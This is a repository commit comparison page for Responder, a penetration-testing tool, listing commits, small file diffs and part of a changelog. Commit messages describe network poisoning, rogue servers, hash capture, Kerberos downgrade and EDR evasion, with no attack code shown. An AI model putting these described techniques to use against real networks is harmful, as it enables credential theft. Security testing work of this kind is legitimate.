PenTest/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2026-01-27 08:39:04 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:revert-216-smbv1ScanWorkAgain
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.2.2.0 PenTest:v3.2.1.0 PenTest:v3.2.0.0 PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1
..
compare: PenTest:v3.2.2.0
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.2.2.0 PenTest:v3.2.1.0 PenTest:v3.2.0.0 PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1

166 Commits
revert-216 ... v3.2.2.0

Author SHA1 Message Date
lgandx
fb29fe25db Implemented RDNSS and DNSSL 2026-01-26 19:05:44 -03:00
lgandx
f1649c136d added db locking on save to DB operations 2026-01-24 23:45:37 -03:00
lgandx
9a2144a8a1 Reformatted help output 2026-01-24 10:55:35 -03:00
lgandx
271b564bd8 Properly formatted etype 17 & 18 hashes + minor fixes 2026-01-24 10:20:54 -03:00
lgandx
83ecb7d343 Use Bind_To6 2026-01-24 10:00:26 -03:00
lgandx
2da22ce312 Now aligned with utils.py IPv6 changes 2026-01-24 09:26:02 -03:00
lgandx
1191936598 updated version number 2026-01-23 21:05:51 -03:00
lgandx
b4a1423875 Changed IPv6 bind logic, now default to local link instead of routable. Can override with -6 .. 2026-01-23 20:47:03 -03:00
lgandx
bb4c041481 DNS TCP binding to all 2026-01-23 20:25:03 -03:00
lgandx
9cda8146df minor update 2026-01-23 20:24:26 -03:00
lgandx
b11946fcb5 removed some debug strings 2026-01-23 20:23:56 -03:00
lgandx
de3eb39b20 removed useless debugging script 2026-01-23 20:23:09 -03:00
lgandx
9234d3b8f7 fixed SRV answer always set to 445. Now has complete mapping.. 2026-01-23 19:08:47 -03:00
lgandx
8bbe77a709 added: bind on IPv6 + fallback to link local in case we don't have a global addr 2026-01-23 18:32:42 -03:00
lgandx
376d2e87d2 Merge branch 'master' of https://github.com/lgandx/Responder 2026-01-07 15:10:43 -03:00
lgandx
683fa6047e updated tips jar 2026-01-07 15:10:19 -03:00
lgandx
1d41902e48 Update README.md 
Long overdue README update
 2026-01-07 15:05:08 -03:00
lgandx
35e6d70d83 Update README.md 2026-01-07 14:13:39 -03:00
lgandx
b74f42f56a added Kerberos to NTLM downgrade 2026-01-07 12:17:22 -03:00
lgandx
1f7858a223 removed unused functions 2026-01-06 22:37:45 -03:00
lgandx
9fa97ef308 removed mysql 2026-01-06 20:56:01 -03:00
lgandx
23587f8b5d added IMAPS 2026-01-06 20:54:03 -03:00
lgandx
9db07b54d6 Added DHCPv6 poisoning + DNS filtering 2026-01-06 20:51:08 -03:00
lgandx
074f152a74 DNS server should be enabled in analyze mode since its a rogue server, not a poisoner 2026-01-06 19:55:07 -03:00
lgandx
e854680360 Merge branch 'master' of https://github.com/lgandx/Responder 2026-01-06 18:54:34 -03:00
lgandx
100b1bbe00 Added STARTTLS support to imap and SMTP 2026-01-06 18:53:56 -03:00
lgandx
b9646c7890 Merge pull request #336 from the-useless-one/fix_smbserver 
Fix Buffer type for SMBv1/2 session request
 2026-01-06 13:43:39 -03:00
yme
fc9cfaf8f8 Fix Buffer type for SMBv1/2 session request 2026-01-06 17:20:52 +01:00
lgandx
367ed8a188 fixed formatting 2026-01-02 14:06:01 -03:00
lgandx
70893cdb8b minor fix 2026-01-02 13:57:48 -03:00
lgandx
e264aae039 fix output 2026-01-02 13:42:14 -03:00
lgandx
a8cb41d09b Now forces clients to authenticate and if possible to use RC4 + correct hash formatting when parsing type 23 2026-01-02 13:40:28 -03:00
lgandx
e2a0ba041a added support for OPT, etc 2026-01-02 09:48:18 -03:00
lgandx
b2b1974b2a added support for SAMR, SRVSVC, WKSSVC, WINREG, SVCCTL, ATSVC, DNSSERVER 2025-12-31 15:51:54 -03:00
lgandx
1833341a33 added suppport for imap ntlm 2025-12-31 15:49:49 -03:00
lgandx
5a114080b4 major fixes, kerberos handling, etc 2025-12-31 15:47:52 -03:00
lgandx
0ffdeb585f DNS server now supports SOA, MX, SRV, ANY, etc 2025-12-31 15:00:01 -03:00
lgandx
73507a671f Client: TGS-REQ → Responder: KRB-ERROR → AS-REQ → KRB-ERROR 25 (pre-auth required) -> AS-REQ with PA-ENC-TIMESTAMP (hash!) 2025-12-31 12:28:59 -03:00
lgandx
9c40a5d265 Added NTLM authentication for IMAP and AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM authentication on SMTP 2025-12-31 10:14:50 -03:00
lgandx
5960d04a51 fixed hashcat hash construction 2025-12-31 09:26:17 -03:00
lgandx
44f6dd2865 msgData is a plain SEQUENCE (0x30) per RFC 3412 2025-12-31 08:42:53 -03:00
lgandx
9d4b64354c added support for all modern SNMPv3 auth algorithms 2025-12-31 02:03:26 -03:00
lgandx
6a5a20dc8b Major fixes, now supporting AES and RC4 hash extraction 2025-12-31 01:41:07 -03:00
lgandx
3dd2ed8370 Added Challenge-response + full SASL mechanisms support 2025-12-30 23:22:00 -03:00
lgandx
74cea27ff9 Added LDAP support for SASL mechanisms: GSSAPI, GSS-SPNEGO, NTLM, DIGEST-MD5 2025-12-30 21:46:03 -03:00
lgandx
9a5e33ae03 added error handling 2025-12-05 14:56:00 -03:00
lgandx
6d66d900f1 added error handling 2025-12-05 14:49:43 -03:00
lgandx
aa4b082071 Merge branch 'master' of https://github.com/lgandx/Responder 2025-12-01 21:48:18 -03:00
lgandx
de5cdf4891 removed old addresses and added new ones. 2025-12-01 21:47:30 -03:00
lgandx
b4427406ee Merge pull request #329 from FLX-0x00/master 
Fix pyproject.toml license metadata incompatibility with PDM backend
 2025-11-29 20:00:45 -03:00
Paul Werther
1457035955 remove the licence classifier 2025-11-05 12:33:22 +01:00
lgandx
7c5a31d803 Merge pull request #325 from TheToddLuci0/add_pyproject_toml 
Add pyprojcet.toml for pip-install ability
 2025-10-30 20:48:59 -03:00
TheToddLuci0
15c173a128 Add pyprojcet.toml for pip-install ability 2025-10-20 14:02:44 -05:00
lgandx
fe5f63269a minor fix on recent merge and version update 2025-08-22 19:15:52 -03:00
lgandx
da74083b46 Merge pull request #315 from vflame6/master 
Disabled printing of ignored LLMNR, NBT-NS and MDNS messages in Analyze Mode with Quiet Mode
 2025-08-22 19:07:29 -03:00
lgandx
004dc1f4f3 Merge pull request #297 from idarlund/patch-1 
quickstart for macos
 2025-08-22 18:42:52 -03:00
lgandx
6fad9f0c3a Merge branch 'master' of https://github.com/lgandx/Responder 2025-08-22 18:32:51 -03:00
lgandx
007367e0e0 minor fix and layout changes 2025-08-22 18:30:49 -03:00
lgandx
08864c7d76 Merge pull request #318 from Helithumper/kerberos-typo 
Typo Fix: Kebreros->Kerberos
 2025-08-22 18:09:47 -03:00
lgandx
32da74c12d Merge branch 'master' into kerberos-typo 2025-08-22 18:09:22 -03:00
lgandx
7a8d06b8d3 Merge pull request #319 from hdm/master 
Correct a very minor typo
 2025-08-22 18:05:39 -03:00
HD Moore
a9c41c97fc fix minor typo 2025-07-28 22:02:19 -05:00
HD Moore
eeceecae8f fix minor typo 2025-07-28 22:01:58 -05:00
Peyton Duncan
f1d8d1a6c4 typo had a typo 2025-07-19 13:58:14 -07:00
Peyton Duncan
a5a2231ec3 typo fix 2025-07-19 13:56:10 -07:00
vflame6
7e6d49bf42 Disabled printing of ignored LLMNR, NBT-NS and MDNS messages in Analyze + Quiet modes 2025-07-09 13:33:07 +05:00
lgandx
398a1fce31 Fixed minor parsing issue in FindIP 2025-05-22 18:45:45 -03:00
lgandx
fa2b8dd5fd minor fixes 2025-05-22 11:42:50 -03:00
lgandx
58eb8731a5 Added SNMP srv enabled by default 2025-05-22 05:34:30 -03:00
lgandx
658480e0a5 added recent changelog 2025-05-22 05:27:55 -03:00
lgandx
a76ee47867 added check for aioquic & updated version to reflect recent changes 2025-05-22 05:23:00 -03:00
lgandx
e346c01695 Merge pull request #310 from ctjf/master 
added quic support based on xpn's work
 2025-05-22 05:17:27 -03:00
lgandx
41ed7c4f4a Merge pull request #308 from BlWasp/error_code_returned 
Add control on the status code returned by the SMB server
 2025-05-22 04:32:13 -03:00
lgandx
ea820ab076 Merge pull request #311 from stfnw/master 
DHCP poisoner: refactor FindIP
 2025-05-22 04:30:07 -03:00
Stefan Walter
a0d1f03617 DHCP poisoner: refactor FindIP 
- do not crash on IP addresses where one octet contains 0x45 0x4f or 0x46

- operate on bytes (avoid encoding/decoding round-trip)
  and use simple string search instead of regular expressions

closes #181
closes #304
 2025-04-12 12:11:00 +02:00
Joshua Fickett
871cdffa97 added quic support based on xpn's work 2025-04-03 15:16:00 -04:00
BlackWasp
e781559be0 Indentation typos 2025-03-16 23:40:51 +01:00
BlackWasp
6bf6887c49 Add status code control 2025-03-16 23:32:19 +01:00
lgandx
545137275f Merge pull request #305 from L1-0/patch-1 
Update RPC.py
 2025-03-13 11:28:24 -03:00
Lino
6743423251 Update RPC.py 
Fix Output of RPC.py
 2025-02-24 11:49:06 +01:00
lgandx
d740fb526f Merge pull request #301 from q-roland/kerberos_relaying_llmnr 
Adding answer name spoofing capabilities to LLMNR poisoner for Kerberos relaying purposes
 2025-01-27 07:22:07 -03:00
User
d3dd37a324 Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose 2025-01-23 14:35:41 -08:00
Idar Lund
38023edfaa Update README.md 2024-11-07 09:21:19 +00:00
Idar Lund
fbcb000a93 quickstart for macos 
added quickstart for macos and changed format on the considerations for macos
 2024-11-07 09:18:55 +00:00
lgandx
e918fe01c6 added option to disable a TLD due to windows 11 infinite loop with _dosvc 2024-09-24 11:06:50 -03:00
lgandx
538e6c0d0d Merge pull request #289 from brightio/patch-3 
StartupMessage doesn't take into account the actual LLMNR, NBT-NS and MDNS
 2024-09-11 17:04:14 -03:00
brightio
990df258a6 StartupMessage doesn't take into account the actual LLMNR, NBT-NS and MDNS status 2024-09-10 16:49:31 +02:00
lgandx
4947ae6e52 Added default mode for TTL option 2024-05-14 11:02:35 -03:00
lgandx
116a056e7d Listed all contributors over time. Thanks for your contribution to this project! 2024-05-08 10:14:11 -03:00
lgandx
d715f2de21 Updated Changelog 2024-05-08 09:41:44 -03:00
lgandx
64cf4d9873 minor fix 2024-05-06 09:56:02 -03:00
lgandx
ccbcd1736f minox typo fix 2024-05-06 09:24:06 -03:00
lgandx
413bc8be31 Fixed issue with smb signing detection 2024-05-06 09:16:36 -03:00
lgandx
bf25abfec8 Merge pull request #275 from nodauf/master 
Random TTL value added to avoid some EDR detections
 2024-05-06 07:33:27 -03:00
lgandx
06b33edc27 Merge pull request #276 from f3rn0s/master 
Add options for poisoners
 2024-05-06 07:10:32 -03:00
f3rn0s
807bd57a96 Add options for poisoners 2024-04-30 15:52:04 +10:00
nodauf
f50f0be59c Add randomness in TTL value to avoid some EDR detections 2024-04-02 16:42:09 +02:00
lgandx
1a2f2fdb22 added support for either resolv.conf or resolvectl 2024-01-06 15:01:43 -03:00
lgandx
e51f24e36c fixed minor bug 2024-01-06 13:48:41 -03:00
lgandx
fa297c8a16 Fixed bug when IPv6 is disabled via GRUB. 2024-01-06 12:44:38 -03:00
lgandx
44bfd1d221 DNS dump updated + removed var dump info on Config-Responder.log 2024-01-06 09:19:10 -03:00
lgandx
66e5b12c56 Updated changelog 2024-01-06 07:15:50 -03:00
lgandx
4b560f6e17 removed debug string 2024-01-04 20:44:13 -03:00
lgandx
e564e5159b removed bowser listener 2024-01-04 20:37:45 -03:00
lgandx
4b14455bdc minor fix on ldap 2024-01-04 19:50:16 -03:00
lgandx
ee5ab9a5fd default -> py3 2024-01-04 19:04:15 -03:00
lgandx
39f8cbb931 various changes. 2024-01-04 18:39:01 -03:00
lgandx
ec3349cb1e minor bugs 2024-01-04 18:22:08 -03:00
lgandx
2b9d89f044 Merge pull request #264 from exploide/ldaps 
Added LDAPS listener
 2024-01-04 17:36:04 -03:00
lgandx
b550dbe4b0 Merge pull request #261 from exploide/fix-escape-sequence-warning 
Fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+
 2024-01-04 17:32:39 -03:00
lgandx
6636317799 updated donation link 2024-01-04 17:31:16 -03:00
lgandx
add6224805 Merge pull request #265 from exploide/mssql-browser-typeerror 
Fixed a TypeError in MSSQLBrowser
 2024-01-04 17:19:58 -03:00
lgandx
700b7d6222 removed patreon donation link. 2024-01-04 17:15:24 -03:00
lgandx
66ee7f8f08 Fixed issue in http srv, more hashes & signature reduction. 2024-01-04 17:11:44 -03:00
lgandx
08e44d72ac removed useless string 2024-01-04 15:38:41 -03:00
exploide
20cdd9c7c2 fixed a TypeError in MSSQLBrowser 
fixes #251
 2024-01-04 15:26:26 +01:00
exploide
6d61f0439c added LDAPS listener 
fixes #263
 2024-01-04 14:50:44 +01:00
exploide
e9bd8a43ef fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+ 2023-12-14 18:20:04 +01:00
lgandx
4ea3d7b765 removed debug 2023-12-07 09:43:10 -03:00
lgandx
f670fbaa7f added:error handling on exceptions. 2023-12-07 09:36:54 -03:00
lgandx
31393c7072 fixed minor bug on py 3.10 2023-12-07 09:33:38 -03:00
lgandx
2f1b81b024 minor fix 2023-12-06 18:44:35 -03:00
lgandx
aed939c1ae Merge pull request #249 from ShutdownRepo/netifaces 
Upgrading `netifaces` requirement
 2023-11-17 10:12:31 -03:00
lgandx
6f0217feed Merge pull request #250 from ShutdownRepo/collections.abc 
Upgrading `collections` import
 2023-11-17 10:11:20 -03:00
lgandx
6b1f53a6f4 Merge pull request #254 from syntricks/patch-1 
Fixing soft failure which results in missed SMTP credential interception
 2023-11-17 10:09:58 -03:00
lgandx
351b1aad9e Merge pull request #256 from exploide/basic-auth-fix 
Fixed parsing of HTTP basic auth containing colons
 2023-11-17 10:09:08 -03:00
lgandx
bf1cf1c335 Merge pull request #257 from brightio/patch-1 
Handle FTP, MQTT and WinRM exceptions properly
 2023-11-17 10:08:04 -03:00
brightio
6a76437464 Handle WinRM exceptions properly 2023-11-13 20:49:01 +01:00
brightio
f6d1e6027a Handle MQTT exceptions properly 2023-11-13 20:46:46 +01:00
brightio
cb042d16a2 Handle FTP exceptions properly 2023-11-13 20:39:29 +01:00
exploide
90ff1d37a7 gitignore: ignore pyc and certificate files 2023-11-09 18:18:43 +01:00
exploide
dc33d1f858 fixed HTTP basic auth parsing when password contains colons 
fixes #255
 2023-11-09 18:14:36 +01:00
Syntricks
34603aed0a Fixing soft failure which results in missed SMTP credential interception 
Without this responder silently fails. During debugging I observed [[[can only concatenate str (not "bytes") to str]]] error. Enabling decoding of bytes made the error disappear and credentials properly intercepted (on-screen stdout, logs and to DB). 
Thank you for a very useful tool :)
 2023-10-12 00:51:19 +03:00
Shutdown
aa8d81861b Fixing collections import issue for /tools/MultiRelay/odict.py 2023-09-22 00:43:58 +02:00
Shutdown
2c4cadbf7d Fixing import issue like in /tools/odict.py 2023-09-22 00:43:25 +02:00
Shutdown
3a23ccdef8 Upgrading collections import 2023-09-21 20:18:13 +02:00
Shutdown
2b37d5763a Upgrading netifaces requirement 2023-09-21 20:14:59 +02:00
lgandx
de20dcf408 Merge pull request #243 from nobbd/nobbd-patch-1 
Fix bug with single byte comparisons in python3
 2023-09-11 07:12:28 -03:00
nobbd
6063c2f77a Update SMB.py 2023-08-15 16:03:30 +02:00
nobbd
b61a640747 Update SMB.py 2023-08-15 15:50:53 +02:00
nobbd
4ec2631ab0 Update Finger.py to fix bug with single byte comparisons in python3 2023-08-15 15:36:10 +02:00
nobbd
9713fe0e70 Update RunFinger.py to fix bug with single byte comparisons in python3 2023-08-15 15:34:08 +02:00
nobbd
63954a539c Update RelayMultiCore.py to fix bug with single byte comparisons in python3 2023-08-15 15:18:55 +02:00
nobbd
728b100bfd Update MSSQL.py to fix bug with single byte comparisons in python3 2023-08-15 15:15:23 +02:00
nobbd
a205b58091 Update SMB.py to fix single byte comparisons in python3 2023-08-15 15:08:42 +02:00
lgandx
83c817d9c2 Merge pull request #222 from lowSoA/enhancement-snmpv3-support 
Implement SNMPv3 support
 2023-08-13 11:21:10 -03:00
lgandx
56e5fa0d29 Merge pull request #236 from NullByteZero/master 
Implemented MQTT server
 2023-08-13 11:17:58 -03:00
lgandx
332697fbd9 Merge pull request #238 from deltronzero/master 
fix typo of ServerTlype
 2023-08-13 11:13:30 -03:00
lgandx
d8a30a5ec7 Merge pull request #224 from kevintellier/master 
Added full path to gen-self-sign-cert.sh
 2023-08-13 10:31:48 -03:00
deltronzero
0c80b76f57 fix typo of ServerTlype 2023-06-12 07:50:01 -07:00
Ziga P
a21b36605c Implemented MQTT support 2023-06-05 20:19:44 +02:00
lgandx
8e12d2bcfe Removed Patreon link 2023-05-22 20:32:45 -03:00
lgandx
ff21c5452c Merge pull request #232 from also-here/master 
Allowing IPv6 addresses in RespondTo and DontRespondTo
 2023-05-23 01:15:15 +02:00
also-here
5c83b7c45b Update LLMNR.py 
Added a IPv6 check for the DNS address. IsOnTheSameSubnet does not currently support IPv6 which is fine as ICMP-Redirecy.py currently does not yet support IPv6 either.
 2023-03-14 21:21:19 -05:00
lgandx
07c963f5ea Merge pull request #233 from SilverSteven/fulfill-license-obligation 
append changelog to fulfill the license obligation
 2023-03-14 08:19:28 -03:00
steven
feecf8ed0b append changelog to fulfill the license obligation 2023-03-09 10:31:01 +08:00
also-here
e36fafb783 Update Responder.conf 
added Don't Respond To instructions
 2023-03-05 19:13:25 -06:00
also-here
5ec5412fb9 Update settings.py 
removed redundant upper()
 2023-03-05 18:57:08 -06:00
also-here
6a11fe8b6a Updated with some IPv6 
Added IPv6 options to RespondTo and DontRespondTo
 2023-03-05 18:40:32 -06:00
also-here
3f5c836ba0 Update settings.py 
compresses expanded IPv6 addresses
 2023-03-05 18:33:48 -06:00
also-here
8953f87bbd Update settings.py to expand IPv6 addresses. 
Still handles IPv4 addresses as well.
 2023-03-03 16:20:22 -06:00
kevintellier
69f431e58f Added full path to gen-self-sign-cert.sh 2022-12-21 18:04:07 +01:00
soa
edb85332ab SNMPv3 support 2022-11-18 18:21:23 +01:00
lgandx
9c303d7bd5 Merge pull request #219 from SAERXCIT/master 
Extend --disable-ess to HTTP
 2022-11-08 09:38:18 -03:00
lgandx
b61d211b10 Merge pull request #220 from lgandx/revert-216-smbv1ScanWorkAgain 
Revert "run smbv1 scan in runfinger"
 2022-11-08 09:36:02 -03:00
SAERXCIT
660b6ca309 Extend --disable-ess to HTTP 2022-11-08 12:23:01 +01:00
41 changed files with 8918 additions and 1273 deletions
Expand all files Collapse all files

1
.github/FUNDING.yml vendored
View File

@@ -1,3 +1,2 @@
github: lgandx
patreon: PythonResponder
custom: 'https://paypal.me/PythonResponder'

10
.gitignore vendored
View File

@@ -1,5 +1,15 @@
# Python artifacts
*.pyc
.venv/
# Responder logs
*.db
*.txt
*.log
# Generated certificates and keys
certs/*.crt
certs/*.key
# IDE
.idea/

713
CHANGELOG.md Normal file
View File

@@ -0,0 +1,713 @@
n.n.n / 2025-05-22
==================
* added check for aioquic & updated version to reflect recent changes
* Merge pull request #310 from ctjf/master
* Merge pull request #308 from BlWasp/error_code_returned
* Merge pull request #311 from stfnw/master
* DHCP poisoner: refactor FindIP
* added quic support based on xpn's work
* Indentation typos
* Add status code control
* Merge pull request #305 from L1-0/patch-1
* Update RPC.py
* Merge pull request #301 from q-roland/kerberos_relaying_llmnr
* Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
n.n.n / 2025-05-22
==================
* added check for aioquic & updated version to reflect recent changes
* Merge pull request #310 from ctjf/master
* Merge pull request #308 from BlWasp/error_code_returned
* Merge pull request #311 from stfnw/master
* DHCP poisoner: refactor FindIP
* added quic support based on xpn's work
* Indentation typos
* Add status code control
* Merge pull request #305 from L1-0/patch-1
* Update RPC.py
* Merge pull request #301 from q-roland/kerberos_relaying_llmnr
* Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
<!-- insertion marker -->
## Unreleased
<small>[Compare with latest](https://github.com/lgandx/Responder/compare/v3.1.4.0...HEAD)</small>
### Added
- Add options for poisoners ([807bd57](https://github.com/lgandx/Responder/commit/807bd57a96337ab77f2fff50729a6eb229e5dc37) by f3rn0s).
- Add randomness in TTL value to avoid some EDR detections ([f50f0be](https://github.com/lgandx/Responder/commit/f50f0be59c0de6fd0ff8eef62ba31db96815c878) by nodauf).
- added support for either resolv.conf or resolvectl ([1a2f2fd](https://github.com/lgandx/Responder/commit/1a2f2fdb22a2bf8b04e0ac99219831457b7ba43a) by lgandx).
### Fixed
- Fixed issue with smb signing detection ([413bc8b](https://github.com/lgandx/Responder/commit/413bc8be3169d215f7d5f251a78c8d8404e52f61) by lgandx).
- fixed minor bug ([e51f24e](https://github.com/lgandx/Responder/commit/e51f24e36c1f84bc995a690d385c506c35cc6175) by lgandx).
- Fixed bug when IPv6 is disabled via GRUB. ([fa297c8](https://github.com/lgandx/Responder/commit/fa297c8a16f605bdb731542c67280a4d8bc023c4) by lgandx).
### Removed
- removed debug string ([4b560f6](https://github.com/lgandx/Responder/commit/4b560f6e17493dcfc6bf653d0ebe0547a88735ac) by lgandx).
- removed bowser listener ([e564e51](https://github.com/lgandx/Responder/commit/e564e5159b9a1bfe3c5f1101b3ab11672e0fd46b) by lgandx).
<!-- insertion marker -->
## [v3.1.4.0](https://github.com/lgandx/Responder/releases/tag/v3.1.4.0) - 2024-01-04
<small>[Compare with v3.1.3.0](https://github.com/lgandx/Responder/compare/v3.1.3.0...v3.1.4.0)</small>
### Added
- added LDAPS listener ([6d61f04](https://github.com/lgandx/Responder/commit/6d61f0439c1779767c9ea9840ac433ed98e672cd) by exploide).
- added:error handling on exceptions. ([f670fba](https://github.com/lgandx/Responder/commit/f670fbaa7fcd3b072aef7cf29f43c1d76d6f13bf) by lgandx).
- Added full path to gen-self-sign-cert.sh ([69f431e](https://github.com/lgandx/Responder/commit/69f431e58f07c231e75a73b0782855e9277573ac) by kevintellier).
- add flag (-s) to enable smbv1scan ([cf0c4ee](https://github.com/lgandx/Responder/commit/cf0c4ee659779c027374155716f09b13cb41abb5) by requin).
- add hostname on smbv2 scan result ([709df2c](https://github.com/lgandx/Responder/commit/709df2c6e18ec2fa6647fdaaa4d9f9e2cb7920f8) by requin).
- Added dump by legacy protocols ([b8818ed](https://github.com/lgandx/Responder/commit/b8818ed0c47d9d615c4ba1dcff99e8d2d98296d5) by lgandx).
- added requirements.txt ([00d9d27](https://github.com/lgandx/Responder/commit/00d9d27089d8f02658b08f596d28d1722c276d57) by lgandx).
- Added: append .local TLD to DontRespondToNames + MDNS bug fix ([0bc226b](https://github.com/lgandx/Responder/commit/0bc226b4beaa84eb3ac26f5d563959ccf567262b) by lgandx).
- Added Quiet mode ([2cd66a9](https://github.com/lgandx/Responder/commit/2cd66a9b92aa6ca2b7fba0fea03b0a285c186683) by jb).
### Fixed
- Fixed issue in http srv, more hashes & signature reduction. ([66ee7f8](https://github.com/lgandx/Responder/commit/66ee7f8f08f57926f5b3694ffb9e87619eee576f) by lgandx).
- fixed a TypeError in MSSQLBrowser ([20cdd9c](https://github.com/lgandx/Responder/commit/20cdd9c7c23e620e3d530f76003b94407882e9cd) by exploide).
- fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+ ([e9bd8a4](https://github.com/lgandx/Responder/commit/e9bd8a43ef353a03ba9195236a3aa5faf3788faa) by exploide).
- fixed minor bug on py 3.10 ([31393c7](https://github.com/lgandx/Responder/commit/31393c70726206fc1056f76ef6b81a981d7954c5) by lgandx).
- fixed HTTP basic auth parsing when password contains colons ([dc33d1f](https://github.com/lgandx/Responder/commit/dc33d1f858e9bbc58ae8edf030dbfee208d748f1) by exploide).
- Fixing soft failure which results in missed SMTP credential interception ([34603ae](https://github.com/lgandx/Responder/commit/34603aed0aadfe3c3625ea729cbc9dc0f06e7e73) by Syntricks).
- Fixing collections import issue for /tools/MultiRelay/odict.py ([aa8d818](https://github.com/lgandx/Responder/commit/aa8d81861bcdfc3dbf253b617ec044fd4807e9d4) by Shutdown).
- Fixing import issue like in /tools/odict.py ([2c4cadb](https://github.com/lgandx/Responder/commit/2c4cadbf7dec6e26ec2494a0cfde38655f5bebaf) by Shutdown).
- fix typo of ServerTlype ([0c80b76](https://github.com/lgandx/Responder/commit/0c80b76f5758dfae86bf4924a49b29c31e2e77f8) by deltronzero).
- Fixed potential disruption on Proxy-Auth ([c51251d](https://github.com/lgandx/Responder/commit/c51251db5ff311743238b1675d52edb7c6849f00) by lgandx).
- fixed the RespondTo/DontRespondTo issue ([2765ef4](https://github.com/lgandx/Responder/commit/2765ef4e668bc3493924aae5032e3ec63078ac42) by lgandx).
### Removed
- removed patreon donation link. ([700b7d6](https://github.com/lgandx/Responder/commit/700b7d6222afe3c1d6fb17a0a522e1166e6ad025) by lgandx).
- removed useless string ([08e44d7](https://github.com/lgandx/Responder/commit/08e44d72acd563910c153749b3c204ce0304bdd1) by lgandx).
- removed debug ([4ea3d7b](https://github.com/lgandx/Responder/commit/4ea3d7b76554dee5160aaf76a0235074590284f8) by lgandx).
- Removed Patreon link ([8e12d2b](https://github.com/lgandx/Responder/commit/8e12d2bcfe11cc23e35ea678b9e4979856183d0e) by lgandx).
- Removed machine accounts dump, since they are not crackable ([c9b5dd0](https://github.com/lgandx/Responder/commit/c9b5dd040e27de95638b33da7a35e5187efb4aac) by lgandx).
## [v3.1.3.0](https://github.com/lgandx/Responder/releases/tag/v3.1.3.0) - 2022-07-26
<small>[Compare with v3.1.2.0](https://github.com/lgandx/Responder/compare/v3.1.2.0...v3.1.3.0)</small>
### Fixed
- Fixed: Warnings on python 3.10 ([9b1c99c](https://github.com/lgandx/Responder/commit/9b1c99ccd29890496b0194c061266997e28be4c0) by lgandx).
- Fix missing paren error ([0c7a3ff](https://github.com/lgandx/Responder/commit/0c7a3ffabeee77cb9f3d960168a357e9583b2f9f) by cweedon).
- Fix double logging of first hash or cleartext ([e7eb3bc](https://github.com/lgandx/Responder/commit/e7eb3bcce85c5d437082214c0e8044919cccee56) by Gustaf Blomqvist).
### Removed
- removed -r reference from help msg. ([983a1c6](https://github.com/lgandx/Responder/commit/983a1c6576cb7dfe6cabea93e56dc4f2c557621b) by lgandx).
- removed -r references ([03fa9a7](https://github.com/lgandx/Responder/commit/03fa9a7187c80586629c58a297d0d78f2f8da559) by lgandx).
## [v3.1.2.0](https://github.com/lgandx/Responder/releases/tag/v3.1.2.0) - 2022-02-12
<small>[Compare with v3.1.1.0](https://github.com/lgandx/Responder/compare/v3.1.1.0...v3.1.2.0)</small>
### Added
- added support for OPT EDNS ([5cf6922](https://github.com/lgandx/Responder/commit/5cf69228cf5ce4c0433904ee1d05955e8fd6f618) by lgandx).
### Fixed
